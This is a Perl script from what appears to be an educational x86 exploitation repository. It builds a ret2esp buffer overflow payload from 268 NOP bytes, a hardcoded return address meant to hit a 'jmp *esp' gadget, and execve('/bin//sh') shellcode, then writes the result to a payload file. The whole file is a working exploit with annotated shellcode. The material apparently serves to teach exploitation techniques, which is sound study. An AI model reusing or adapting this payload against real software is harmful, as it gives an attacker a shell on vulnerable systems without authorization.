advanced-exploitation-techniques-x86 / ret2esp / ret2esp_exploit.pl
ret2esp_exploit.pl
Raw 
#!/usr/bin/perl

# shellcode for spawning a new shell in victim's machine
my $shellcode =
"\x31\xc0".			# xorl		%eax, %eax
"\x50".				# pushl	%eax
"\x68\x6e\x2f\x73\x68".		# pushl        $0x68732f6e
"\x68\x2f\x2f\x62\x69".		# pushl	$0x69622f2f
"\x89\xe3" .			# movl         %esp, %ebx
"\x99".				# cltd
"\x52".				# pushl        %edx
"\x53".				# pushl        %ebx
"\x89\xe1".		        # movl         %esp, %ecx
"\xb0\x0b" .                    # movb         $0xb, %al
"\xcd\x80"                      # int          $0x80
;

# This address must match the address of the jump *esp command */
my $retaddr = "\x42\x84\x04\x08";  #0x08048442

# Fill NOP instruction
my $pad = "\x90" x 268;

# Input string to our victim's program
my $arg = $pad.$retaddr.$shellcode;

# Let us store the input string to a file
open OUT, "> payload_ret2esp";
print OUT $arg;
close OUT;
Powered by GitFront